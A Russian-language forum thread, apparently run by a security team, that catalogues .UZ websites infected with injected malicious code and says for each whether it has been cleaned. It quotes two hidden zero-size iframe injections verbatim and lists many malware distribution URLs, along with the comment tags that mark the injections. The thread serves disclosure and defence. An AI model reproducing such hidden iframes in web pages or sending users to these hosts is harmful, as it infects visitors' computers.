Лента: УГРОЗЫ НА САЙТАХ .UZ
 

Уважаемые пользователи!

В связи с участившимися случаями внедрения вредоносного кода на веб-сайты доменной зоны .UZ решено открыть данный тред, в котором мы будем публиковать названия зараженных сайтов, которые могут предоставлять угрозу и инфицировать пользовательские рабочие станции вирусами и троянами.

По устранению угрозы на сайте мы будем давать анонс о безопасности ресурса.

Если вы самостоятельно обнаружите какой-либо инфицированный сайт, то просим вас сообщить нам об этом по этой ссылке.

На веб-сайте hттp://www.me.uz были обнаружены сразу две ссылки, загружающие вредоносное ПО на компьютер пользователя.

Первая вредоносная ссылка:

[HTML]<html><iframe src=http://oya.ru/vyhod/numizmat/ima/ frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe></html>[/HTML]

Вторая вредоносная ссылка:

[HTML]<iframe src="http://zlo-x.net/XDS/iframe.php" width=0 height=0 border=0></iframe>[/HTML]

Просим с осторожностью заходить на указанный веб-сайт до решения проблемы и заблокировать вредоносные ссылки в своих межсетевых экранах.

update: Сайт излечен. Вредоносный код убран.

www.arksugurta.uz
 

На веб-сайте hттp://www.arksugurta.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->
После расшифровки кода (а зашифрован он аж 4 раза) получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

www.elgroup.uz
 

На веб-сайте hттp://www.elgroup.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 7 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

www.innovation.uz
 

На веб-сайте hттp://www.innovation.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 2 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

www.iptv.uz
 

На веб-сайте hттp://www.iptv.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в одном месте файла index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

roller.sarkor.uz
 

На веб-сайте hттp://roller.sarkor.uz были обнаружены 2 вредоносные ссылки.

Первая ссылка:

Вторая ссылка:

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

www.versal.uz
 

На веб-сайте hттp://www.versal.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 3 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

www.asus.uz
 

На веб-сайте hттp://www.asus.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 1 месте в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

www.glob.uz
 

На веб-сайте hттp://www.glob.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 9 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

www.baik.uz
 

На веб-сайте hттp://www.baik.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!-- ~ --> вредоносный код <!-- ~ -->

Внедрен он в 3 местах в файле index.

Вредоносная ссылка: http://www.ragil.com/bannerstand/head03.htm
Далее, идет переадресация сюда: http://ianburke.com/ex/index.php

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

mingbulak.connect.uz
 

На веб-сайте hттp://mingbulak.connect.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[O]--><script>document.write вредоносный код <!--[/O]-->

Внедрен он в 2 местах в файле index.

Вредоносная ссылка: hттp://www.dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

tashkent.sarkor.uz
 

На веб-сайте hттp://tashkent.sarkor.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[O]--><script>document.write вредоносный код <!--[/O]-->

Внедрен он в одном месте в файле index.

Вредоносная ссылка: hттp://www.dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

www.alutex.uz
 

На веб-сайте hттp://www.alutex.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!-- ~ --> вредоносный код <!-- ~ -->

Внедрен он в одном месте в файле index.

Вредоносная ссылка: hттp://www.kiote.info/ip/index.php

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Информация изменена. Проверьте посты заново.

По мере наших сил попытаемся информировать ежедневно.

www.flowershop.uz
 

На веб-сайте hттp://www.flowershop.uz был обнаружен код, загружающий на компьютер вредоносное ПО.

Код находится между тегами <!-- start get_javascript вредоносная ссылка <!-- end get_javascript(applicationtop2header) //-->

Внедрен он в одном месте в файле index.

Вредоносная ссылка: hттp://977398530/?2954196ea44dc2a0

А также: hттp://malasha.com и hттp://977398531/s

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

www.admiral.uz
 

На веб-сайте hттp://www.admiral.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[O]--><script>document.write вредоносный код <!--[/O]-->

Внедрен он в 2 местах в файле index.

Вредоносная ссылка: hттp://www.dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

www.al-aziz.uz
 

На веб-сайте hттp://www.al-aziz.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <iframe src вредоносный код </iframe>

Внедрен он в одном месте в файле index.

Вредоносная ссылка: http://coolsite.ho.com.ua/_XDS_TDS_1.2/iframe.php

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

www.asg.uz
 

На веб-сайте hттp://www.asg.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <iframe> вредоносный код </iframe>

Внедрен он в 5 местах в файле index.

Вредоносная ссылка: http://my-loads.info/ip/index.php

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

www.newmax.uz
 

На веб-сайте hттp://www.newmax.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <iframe> вредоносный код </iframe>

Внедрен он в одном месте в файле index.

Вредоносная ссылка: http://www.alaqiq.net/quran/stata/index.php

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

www.podarki.uz
 

На веб-сайте hттp://www.podarki.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <iframe> вредоносный код </iframe>

Внедрен он в одном месте в файле index.

Вредоносная ссылка: http://www.alaqiq.net/quran/stata/index.php

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

www.realvid.uz
 

На веб-сайте hттp://www.realvid.uz были обнаружены 2 кода, загружающие на компьютер вредоносное ПО.

Первый код находится между тегами <!-- ~ --><iframe вредоносный код </iframe><!-- ~ -->

Второй код находится между тегами <!-- o65 --><iframe вредоносный код </iframe><!-- c65 -->

Внедрен он в 2 местах в файле index.

Первая вредоносная ссылка: http://mdfc.info
Вторая вредоносная ссылка: http://volkoeb.info/xd/go.php

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

www.parfumgallery.uz
 

На веб-сайте hттp://www.parfumgallery.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[O]--> вредоносный код <!--[/O]-->

Внедрен он в 2 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

www.noni.uz
 

На веб-сайте hттp://www.noni.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!-- ~ --> вредоносный код <!-- ~ -->

Внедрен он в 4 местах в файле index.

Вредоносная ссылка: http://www.pozhary.net/images/znaki/check.php

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

www.minzdr.uz
 

На веб-сайте hттp://www.minzdr.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!-- ~ --> вредоносный код <!-- ~ -->

Внедрен он в одном месте в файле index.

Вредоносная ссылка: hттp://1com.ws/cool/index.php

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

www.mikrokreditbank.uz
 

На веб-сайте hттp://www.mikrokreditbank.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[O]--> вредоносный код <!--[/O]-->

Внедрен он в 4 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

www.kmn.uz
 

На веб-сайте hттp://www.kmn.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в одном месте в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

www.keetas.uz
 

На веб-сайте hттp://www.keetas.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в одном месте в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

www.kamini.uz
 

На веб-сайте hттp://www.kamini.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[O]--> вредоносный код <!--[/O]-->

Внедрен он в 2 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

www.irmoq.uz
 

На веб-сайте hттp://www.irmoq.uz был обнаружен код, загружающий на компьютер вредоносное ПО.

Код находится между тегами <!-- ~ --> вредоносный код <!-- ~ -->

Внедрен он в 2 местах в файле index.

Вредоносная ссылка: http://carsauto.org/exp.htm

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

www.intek.uz
 

На веб-сайте hттp://www.intek.uz был обнаружен код, загружающий на компьютер вредоносное ПО.

Код находится между тегами <iframe> вредоносный код </iframe>

Внедрен он в одном месте в файле index.

Вредоносная ссылка: http://0xcb.0xdf.0x9e.0x0c/t

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

www.in.uz
 

На веб-сайте hттp://www.in.uz был обнаружен код, загружающий на компьютер вредоносное ПО.

Код находится между тегами <iframe> вредоносный код </iframe>

Внедрен он в одном месте в файле index.

Вредоносная ссылка: http://md5f1h.msk.ru/ice/index.php

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

www.immunology.uz
 

На веб-сайте hттp://www.immunology.uz был обнаружен код, загружающий на компьютер вредоносное ПО.

Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в одном месте в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

www.filesearch.uz
 

На веб-сайте hттp://www.filesearch.uz был обнаружен код, загружающий на компьютер вредоносное ПО.

Код находится между тегами <iframe> вредоносный код </iframe>

Внедрен он в одном месте в файле index.

Вредоносная ссылка: http://zoob.rxfly.net

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

и какие же способы защиты? или только отслеживать посты в данной теме? да и не запомнишь всех сайтов?

или же рассылать провайдерам, чтобы они комплексно блокировали такие ссылки для своих клиентов, переводя ссылку на страницу с описанием проблемы, мол зараженная страница? нормальный сервис

ДЖ, провайдеров держим в копии.

уверен, они ничего не делают, кроме прочтения сообщения :(

Ответ:

Было бы хорошо блокировать ещё до провайдеров.